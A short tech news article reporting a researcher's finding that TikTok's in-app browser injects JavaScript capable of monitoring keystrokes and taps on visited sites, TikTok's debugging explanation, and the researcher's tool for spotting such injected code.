TikTok is one of the most popular social media platforms. It allows users to record videos and share them on the platform worldwide. However, a security researcher discovered JavaScript, which lets the app monitor all input like passwords and credit card numbers, in TikTok’s in-app browser. Here are the details.
TikTok’s in-app browser includes a spy code
Some popular social media apps don’t let users out of the app when they click on a link. They offer to open the link in their little in-app browser instead. TikTok is also working in this system for its users. However, software researcher Felix Krause discovered that TikTok inserts a code. This code can monitor users’ activity on outside websites, including all keyboard inputs and taps. The company has denied that it doesn’t use the code for malicious reasons.
TikTok doesn’t allow users to open the links with the phone’s browsers like Safari or Chrome. It uses the TikTok-made in-app browser instead. Thanks to this browser, The platform can track the users’ activity by injecting lines of JavaScript into the websites visited within the app. Then, TikTok can monitor many of the users’ keyboards, and taps on buttons and links.
Felix Krause said, “This was an active choice the company made, This is a non-trivial engineering task. This does not happen by mistake or randomly.” Then TikTok spokesperson Maureen Shanahan said, “Like other platforms, we use an in-app browser to provide an optimal user experience, but the Javascript code in question is used only for debugging, troubleshooting, and performance monitoring of that experience — like checking how quickly a page loads or whether it crashes.”
Felix Krause announced that he launches the InAppBrowser tool. It has a list of the apps such as TikTok, Instagram, Facebook Messenger, and Facebook that uses the in-app browser for the outside links. Users are able to see the tracking codes, website metadata, and JavaScript files with this tool.